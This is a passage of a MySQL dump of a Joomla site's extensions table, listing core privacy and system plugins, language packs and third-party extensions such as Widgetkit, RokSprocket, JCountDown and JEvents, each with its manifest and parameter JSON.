(486, 0, 'plg_system_logrotation', 'plugin', 'logrotation', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_logrotation\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_LOGROTATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logrotation\"}', '{\"lastrun\":1567773401}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(487, 0, 'plg_privacy_user', 'plugin', 'user', 'privacy', 0, 1, 1, 0, '{\"name\":\"plg_privacy_user\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(488, 0, 'plg_quickicon_privacycheck', 'plugin', 'privacycheck', 'quickicon', 0, 1, 1, 0, '{\"name\":\"plg_quickicon_privacycheck\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_QUICKICON_PRIVACYCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacycheck\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(489, 0, 'plg_user_terms', 'plugin', 'terms', 'user', 0, 0, 1, 0, '{\"name\":\"plg_user_terms\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_USER_TERMS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"terms\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(490, 0, 'plg_privacy_contact', 'plugin', 'contact', 'privacy', 0, 1, 1, 0, '{\"name\":\"plg_privacy_contact\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(491, 0, 'plg_privacy_content', 'plugin', 'content', 'privacy', 0, 1, 1, 0, '{\"name\":\"plg_privacy_content\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0);
INSERT INTO `y57u5_extensions` (`extension_id`, `package_id`, `name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `system_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
(492, 0, 'plg_privacy_message', 'plugin', 'message', 'privacy', 0, 1, 1, 0, '{\"name\":\"plg_privacy_message\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_MESSAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"message\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(493, 0, 'plg_privacy_actionlogs', 'plugin', 'actionlogs', 'privacy', 0, 1, 1, 0, '{\"name\":\"plg_privacy_actionlogs\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(494, 0, 'plg_captcha_recaptcha_invisible', 'plugin', 'recaptcha_invisible', 'captcha', 0, 0, 1, 0, '{\"name\":\"plg_captcha_recaptcha_invisible\",\"type\":\"plugin\",\"creationDate\":\"November 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_INVISIBLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha_invisible\"}', '{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(495, 0, 'plg_privacy_consents', 'plugin', 'consents', 'privacy', 0, 1, 1, 0, '{\"name\":\"plg_privacy_consents\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONSENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"consents\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(600, 802, 'English (en-GB)', 'language', 'en-GB', '', 0, 1, 1, 1, '{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8\",\"description\":\"en-GB site language\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(601, 802, 'English (en-GB)', 'language', 'en-GB', '', 1, 1, 1, 1, '{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8\",\"description\":\"en-GB administrator language\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(700, 0, 'files_joomla', 'file', 'joomla', '', 0, 1, 1, 1, '{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(802, 0, 'English (en-GB) Language Pack', 'package', 'pkg_en-GB', '', 0, 1, 1, 1, '{\"name\":\"English (en-GB) Language Pack\",\"type\":\"package\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8.1\",\"description\":\"en-GB language pack\",\"group\":\"\",\"filename\":\"pkg_en-GB\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10041, 0, 'plg_content_jincludes', 'plugin', 'jincludes', 'content', 0, 1, 1, 0, '{\"legacy\":false,\"name\":\"plg_content_jincludes\",\"type\":\"plugin\",\"creationDate\":\"February 26, 2012\",\"author\":\"Andrea Azzini\",\"copyright\":\"(C) 2008 - 2012 Andrea Azzini\",\"authorEmail\":\"andreazzini@gmail.com\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/jincludes\",\"version\":\"1.0\",\"description\":\"PLG_CONTENT_JINCLUDES_XML_DESCRIPTION\",\"group\":\"\"}', '{\"show_errors\":\"no\",\"key1\":\"event_date\",\"type1\":\"html\",\"code1\":\"<div class=\\\"event\\\">\\r\\n<p class=\\\"event-time\\\"><span class=\\\"date\\\">03<\\/span><span class=\\\"month\\\">dec<\\/span><\\/p>\\r\\nyour text here<\\/div>\",\"key2\":\"\",\"type2\":\"html\",\"code2\":\"\",\"key3\":\"\",\"type3\":\"html\",\"code3\":\"\",\"key4\":\"\",\"type4\":\"html\",\"code4\":\"\",\"key5\":\"\",\"type5\":\"html\",\"code5\":\"\",\"key6\":\"\",\"type6\":\"html\",\"code6\":\"\",\"key7\":\"\",\"type7\":\"html\",\"code7\":\"\",\"key8\":\"\",\"type8\":\"html\",\"code8\":\"\",\"key9\":\"\",\"type9\":\"html\",\"code9\":\"\",\"key10\":\"\",\"type10\":\"html\",\"code10\":\"\",\"key11\":\"\",\"type11\":\"html\",\"code11\":\"\",\"key12\":\"\",\"type12\":\"html\",\"code12\":\"\",\"key13\":\"\",\"type13\":\"html\",\"code13\":\"\",\"key14\":\"\",\"type14\":\"html\",\"code14\":\"\",\"key15\":\"\",\"type15\":\"html\",\"code15\":\"\",\"key16\":\"\",\"type16\":\"html\",\"code16\":\"\",\"key17\":\"\",\"type17\":\"html\",\"code17\":\"\",\"key18\":\"\",\"type18\":\"html\",\"code18\":\"\",\"key19\":\"\",\"type19\":\"html\",\"code19\":\"\",\"key20\":\"\",\"type20\":\"html\",\"code20\":\"\",\"key21\":\"\",\"type21\":\"html\",\"code21\":\"\",\"key22\":\"\",\"type22\":\"html\",\"code22\":\"\",\"key23\":\"\",\"type23\":\"html\",\"code23\":\"\",\"key24\":\"\",\"type24\":\"html\",\"code24\":\"\",\"key25\":\"\",\"type25\":\"html\",\"code25\":\"\",\"key26\":\"\",\"type26\":\"html\",\"code26\":\"\",\"key27\":\"\",\"type27\":\"html\",\"code27\":\"\",\"key28\":\"\",\"type28\":\"html\",\"code28\":\"\",\"key29\":\"\",\"type29\":\"html\",\"code29\":\"\",\"key30\":\"\",\"type30\":\"html\",\"code30\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10050, 0, 'Widgetkit', 'module', 'mod_widgetkit', '', 0, 1, 0, 0, '{\"name\":\"Widgetkit\",\"type\":\"module\",\"creationDate\":\"May 2011\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) 2007 - 2011 YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"1.0.0\",\"description\":\"Widgetkit module for Widgetkit developed by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"mod_widgetkit\"}', '{\"widget_id\":\"\",\"moduleclass_sfx\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10051, 0, 'Widgetkit Twitter', 'module', 'mod_widgetkit_twitter', '', 0, 1, 0, 0, '{\"name\":\"Widgetkit Twitter\",\"type\":\"module\",\"creationDate\":\"May 2011\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) 2007 - 2011 YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"1.0.0\",\"description\":\"Twitter module for Widgetkit developed by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"mod_widgetkit_twitter\"}', '{\"style\":\"list\",\"from_user\":\"\",\"to_user\":\"\",\"ref_user\":\"\",\"hashtag\":\"\",\"word\":\"\",\"nots\":\"\",\"limit\":\"5\",\"image_size\":\"48\",\"show_image\":\"1\",\"show_author\":\"1\",\"show_date\":\"1\",\"moduleclass_sfx\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10052, 0, 'System - Widgetkit', 'plugin', 'widgetkit_system', 'system', 0, 1, 1, 0, '{\"name\":\"System - Widgetkit\",\"type\":\"plugin\",\"creationDate\":\"May 2011\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) 2007 - 2011 YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"1.0.0\",\"description\":\"Plugin for Widgetkit developed by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"widgetkit_system\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10053, 0, 'Content - Widgetkit', 'plugin', 'widgetkit_content', 'content', 0, 1, 1, 0, '{\"name\":\"Content - Widgetkit\",\"type\":\"plugin\",\"creationDate\":\"May 2011\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) 2007 - 2011 YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"1.0.0\",\"description\":\"Plugin for Widgetkit developed by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"widgetkit_content\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10055, 0, 'System - Widgetkit Joomla', 'plugin', 'widgetkit_joomla', 'system', 0, 1, 1, 0, '{\"name\":\"System - Widgetkit Joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) 2007 - 2011 YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"1.0.0\",\"description\":\"Joomla Content plugin for Widgetkit developed by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"widgetkit_joomla\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10056, 0, 'Widgetkit', 'component', 'com_widgetkit', '', 1, 1, 0, 0, '{\"name\":\"Widgetkit\",\"type\":\"component\",\"creationDate\":\"July 2016\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"1.5.9\",\"description\":\"Widgetkit - A widget toolkit by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"widgetkit\"}', '{\"lightbox_enable\":\"1\",\"lightbox_title_position\":\"float\",\"lightbox_transition_in\":\"elastic\",\"lightbox_transition_out\":\"elastic\",\"lightbox_overlay_show\":\"1\",\"lightbox_overlay_color\":\"#101010\",\"lightbox_overlay_opacity\":\"0.5\",\"lightbox_selector\":\"a[data-lightbox]\",\"mediaplayer_enable\":\"1\",\"mediaplayer_selector\":\"video,audio\",\"spotlight_enable\":\"1\",\"spotlight_duration\":\"300\",\"spotlight_selector\":\"[data-spotlight]\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10136, 0, 'com_joomlaupdate', 'component', 'com_joomlaupdate', '', 1, 1, 1, 0, '{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.2\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}', '{\"updatesource\":\"sts\",\"customurl\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10178, 0, 'System - RokCommon', 'plugin', 'rokcommon', 'system', 0, 1, 1, 0, '{\"name\":\"System - RokCommon\",\"type\":\"plugin\",\"creationDate\":\"August 4, 2016\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2016 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"3.2.5\",\"description\":\"RokCommon System Plugin\",\"group\":\"\",\"filename\":\"rokcommon\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10179, 0, 'RokSprocket', 'component', 'com_roksprocket', '', 1, 1, 0, 0, '{\"name\":\"RokSprocket\",\"type\":\"component\",\"creationDate\":\"August 4, 2016\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2016 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.1.14\",\"description\":\"Parent for all PHP based projects\",\"group\":\"\",\"filename\":\"roksprocket\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10180, 0, 'RokSprocket Module', 'module', 'mod_roksprocket', '', 0, 1, 1, 0, '{\"name\":\"RokSprocket Module\",\"type\":\"module\",\"creationDate\":\"August 4, 2016\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2016 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.1.14\",\"description\":\"RokSprocket makes it easy to display content in a dynamic, visual layout.\",\"group\":\"\",\"filename\":\"mod_roksprocket\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10181, 0, 'System - RokSprocket', 'plugin', 'roksprocket', 'system', 0, 1, 1, 0, '{\"name\":\"System - RokSprocket\",\"type\":\"plugin\",\"creationDate\":\"August 4, 2016\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2016 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.1.14\",\"description\":\"RokSprocket System Plugin\",\"group\":\"\",\"filename\":\"roksprocket\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(10182, 0, 'Content - RokInjectModule', 'plugin', 'rokinjectmodule', 'content', 0, 1, 1, 0, '{\"name\":\"Content - RokInjectModule\",\"type\":\"plugin\",\"creationDate\":\"August 20, 2015\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2015 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"1.7\",\"description\":\"RokInjectModule Content Plugin.  Use format [module-{moduleid}] in your article to inject a module. You can also specify a style, eg: [module-28 style=xhtml]\",\"group\":\"\",\"filename\":\"rokinjectmodule\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 5, 0),
(10221, 0, 'JCountDown', 'module', 'mod_jcountdown', '', 0, 1, 0, 0, '{\"name\":\"JCountDown\",\"type\":\"module\",\"creationDate\":\"March 2012\",\"author\":\"RvA\",\"copyright\":\"GNU\\/GPL license\",\"authorEmail\":\"info@fxwebdesign.nl\",\"authorUrl\":\"www.fxwebdesign.nl\",\"version\":\"1.5.1\",\"description\":\"\\n\\t<div align=\\\"left\\\"><img src=\\\"..\\/modules\\/mod_jcountdown\\/images\\/jcountdown-screenshot.gif\\\" alt=\\\"JCountDown Module\\\" title=\\\"JCountDown Module\\\" \\/><\\/div>\\n\\t<h3><img src=\\\"..\\/administrator\\/templates\\/bluestork\\/images\\/admin\\/tick.png\\\" alt=\\\"Successfully installed JCountDown module\\\" title=\\\"Successfully installed JCountDown module\\\" \\/>Successfully installed JCountDown module<\\/font><\\/h3><br\\/>\\n\\tJCountDown is a powerful flexible and smart countdown helper based on the Joomla 1.5\\/1.6\\/1.7\\/2.5 module easiness.<br>\\n\\tJCountDown counts the number of days remaining until any annual occasion on the calendar (ie: birthday, Christmas etc).<br>It automatically detects <i>remaining days, hours, minutes and seconds<\\/i> !\\n\\tWith its great features it\'s a must have for Joomla! based websites, wanted to countdown a special event !\\n\\t  <br\\/><br\\/><u>Features:<\\/u><br\\/> \\n\\t  <ul>\\n\\t  <li>Set Special Date<\\/li>\\n\\t  <li>Set Time<\\/li>\\n\\t  <li>Event Title<\\/li>\\n\\t  <li>Tooltip<\\/li>\\n\\t  <li>Date\\/Time\\/Event Footer<\\/li>\\n\\t  <li>Set Module Width<\\/li>\\n\\t  <li>Set Module Height<\\/li>\\n\\t  <li>Set Background Color<\\/li>\\n\\t  <li>Set Border Color<\\/li>\\n\\t  <li>Set Border Width<\\/li>\\n\\t  <li>Set Border Style<\\/li>\\n\\t  <li>Module Title<\\/li>\\n\\t  <li>Introtext Display<\\/li>\\n\\t  <li>Set Font Family<\\/li>\\n\\t  <li>Set Font Size<\\/li>\\n\\t  <li>Set Font Color<\\/li>\\n\\t  <li>CountDown Display<\\/li>\\n\\t  <li>Module Class Suffix<\\/li>\\n\\t  <li>Multilangual<\\/li>\\n\\t  <\\/ul>It\'s a must have for developers who are familiar with HTML !<br\\/><br\\/>\\n\\t  Version: <i>Donationware version.<\\/i><br>\\n\\t  German translation: <i>der Ede.<\\/i><br><br>\\n\\t\",\"group\":\"\"}', '{\"mod_jcountdown_date\":\"12\\/25\\/2012\",\"mod_jcountdown_time\":\"0:00 AM\",\"mod_jcountdown_eventtitle\":\"Christmas\",\"mod_tooltip\":\"1\",\"mod_jcountdown_footer\":\"0\",\"mod_jcountdown_finished\":\"Today it is Christmas! Merry Christmas everybody! Thanks for visting, and hopefully you will keep comming back.\",\"mod_jcountdown_width\":\"180\",\"mod_jcountdown_height\":\"180\",\"mod_jcountdown_contentbgcolor\":\"#f7f7f7\",\"mod_border_color\":\"LightGrey\",\"mod_border_width\":\"1\",\"mod_border_style\":\"solid\",\"mod_modulefont_color\":\"Black\",\"mod_jcountdown_moduletitle\":\"1\",\"mod_jcountdown_introtext\":\"The <a target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"http:\\/\\/www.fxwebdesign.nl\\\\\\\">Countdown<\\/a> has started,\",\"mod_font_family\":\"Georgia, serif\",\"mod_font_size\":\"16\",\"mod_font_color\":\"Red\",\"mod_jcountdown_content\":\"%%D%% Days, <br>%%H%% Hours, <br>%%M%% Minutes, <br>%%S%% Seconds,\",\"moduleclass_sfx\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10223, 0, 'MOD_JEV_CALENDAR_TITLE', 'module', 'mod_jevents_cal', '', 0, 1, 0, 0, '{\"name\":\"MOD_JEV_CALENDAR_TITLE\",\"type\":\"module\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2009-2018 GWE Systems Ltd, 2006-2008 JEvents Project Group\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"MOD_JEV_CALENDAR_DESC\",\"group\":\"\",\"filename\":\"mod_jevents_cal\"}', '{\"@spacer\":\"\",\"com_calViewName\":\"\",\"inc_ec_css\":\"1\",\"cache\":\"1\",\"moduleclass_sfx\":\"\",\"noeventcheck\":\"0\",\"allcats\":\"1\",\"catidnew\":\"\",\"extras0\":\"\",\"extras1\":\"\",\"extras2\":\"\",\"extras3\":\"\",\"extras4\":\"\",\"extras5\":\"\",\"extras6\":\"\",\"extras7\":\"\",\"extras8\":\"\",\"extras9\":\"\",\"extras10\":\"\",\"extras11\":\"\",\"extras12\":\"\",\"extras13\":\"\",\"ignorecatfilter\":\"0\",\"ignorefiltermodule\":\"0\",\"target_itemid\":\"\",\"minical_showlink\":\"1\",\"minical_prevyear\":\"1\",\"minical_prevmonth\":\"1\",\"minical_actmonth\":\"1\",\"minical_actyear\":\"1\",\"minical_nextmonth\":\"1\",\"minical_nextyear\":\"1\",\"minical_usedate\":\"0\",\"modcal_useLocalParam\":\"0\",\"modcal_DispLastMonth\":\"NO\",\"modcal_DispLastMonthDays\":\"0\",\"modcal_DispNextMonth\":\"NO\",\"modcal_DispNextMonthDays\":\"0\",\"modcal_LinkCloaking\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10224, 0, 'COM_JEVENTS', 'component', 'com_jevents', '', 1, 1, 0, 0, '{\"name\":\"COM_JEVENTS\",\"type\":\"component\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd \",\"copyright\":\"(C) 2009-2018 GWE Systems Ltd, 2006-2008 JEvents Project Group\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"COM_JEVENTS_DESC\",\"group\":\"\",\"filename\":\"manifest\"}', '{\"com_difficulty\":\"3\",\"clubcode\":\"\",\"com_calViewName\":\"geraint\",\"darktemplate\":\"0\",\"com_dateformat\":\"0\",\"com_calHeadline\":\"none\",\"com_calUseIconic\":\"1\",\"iconstoshow\":[\"byyear\",\"bymonth\",\"byweek\",\"byday\",\"bycat\",\"search\"],\"com_navbarcolor\":\"green\",\"com_earliestyear\":\"2010\",\"com_latestyear\":\"2017\",\"com_starday\":\"0\",\"com_print_icon_view\":\"0\",\"com_email_icon_view\":\"0\",\"fixjquery\":\"1\",\"bootstrapcss\":\"0\",\"mergemenus\":\"0\",\"show_adminpanel\":\"1\",\"icaltimezonelive\":\"Europe\\/Madrid\",\"regexsearch\":\"1\",\"catseparator\":\"|\",\"jevadmin\":\"196\",\"authorisedonly\":\"0\",\"jevpublishown\":\"0\",\"category_allow_deny\":\"1\",\"rules\":{\"core.manage\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"},\"core.create\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"},\"core.edit.own\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"},\"core.edit\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"},\"core.edit.state\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"},\"core.deleteall\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"},\"core.admin\":{\"1\":\"\",\"9\":\"\",\"6\":\"\",\"7\":\"\",\"2\":\"\",\"3\":\"\",\"4\":\"\",\"5\":\"\",\"8\":\"\"}},\"com_calUseStdTime\":\"0\",\"com_editdateformat\":\"Y-m-d\",\"dayselect\":\"0\",\"disablerepeats\":\"0\",\"defaultcat\":\"0\",\"forcepopupcalendar\":\"1\",\"com_calForceCatColorEventForm\":\"2\",\"editpopup\":\"0\",\"popupw\":\"800\",\"popuph\":\"500\",\"com_single_pane_edit\":\"0\",\"timebeforedescription\":\"0\",\"disablemultiday\":\"0\",\"multiday\":\"1\",\"com_show_editor_buttons\":\"0\",\"com_editor_button_exceptions\":\"pagebreak,readmore\",\"com_notifyboth\":\"0\",\"com_notifyallevents\":\"0\",\"com_notifyauthor\":\"0\",\"showpriority\":\"0\",\"showtimezone\":\"0\",\"checkconflicts\":\"0\",\"skipreferrer\":\"0\",\"defaultstarttime\":\"08:00\",\"defaultendtime\":\"17:00\",\"multicategory\":\"0\",\"blocktoplevelcategories\":\"0\",\"bootstrapchosen\":\"1\",\"allowraw\":\"0\",\"com_edit_toolbar\":\"0\",\"notifymessage\":\"<p>Title : {TITLE} {DESCRIPTION} Event submitted from [ {LIVESITE} ] by [ {AUTHOR} ] View this event : {VIEWLINK} Edit this event : {EDITLINK} Manage your events : <a href=\\\"{MANAGEEVENTS}\\\">Manage Events<\\/a><\\/p>\",\"editreturnto\":\"day.listevents\",\"sender_config\":\"0\",\"sender_name\":\"\",\"sender_email\":\"\",\"email_replyto\":\"1\",\"com_byview\":\"1\",\"com_mailview\":\"1\",\"com_hitsview\":\"1\",\"com_repeatview\":\"1\",\"contact_display_name\":\"0\",\"redirect_detail\":\"0\",\"shownavbar_detail\":\"0\",\"com_calCutTitle\":\"15\",\"com_calMaxDisplay\":\"15\",\"com_calDisplayStarttime\":\"1\",\"com_calShowLegend\":\"1\",\"com_enableToolTip\":\"0\",\"tooltiptype\":\"bootstrap\",\"com_calTTBackground\":\"1\",\"com_calEventListRowsPpg\":\"10\",\"showyearpast\":\"1\",\"com_showrepeats\":\"1\",\"showyeardate\":\"0\",\"year_show_noev_found\":\"0\",\"icaltimezone\":\"\",\"icalkey\":\"SECRET_PHRASE\",\"showicalicon\":\"0\",\"disableicalexport\":\"0\",\"icalmultiday\":\"0\",\"icalmultiday24h\":\"0\",\"feimport\":\"0\",\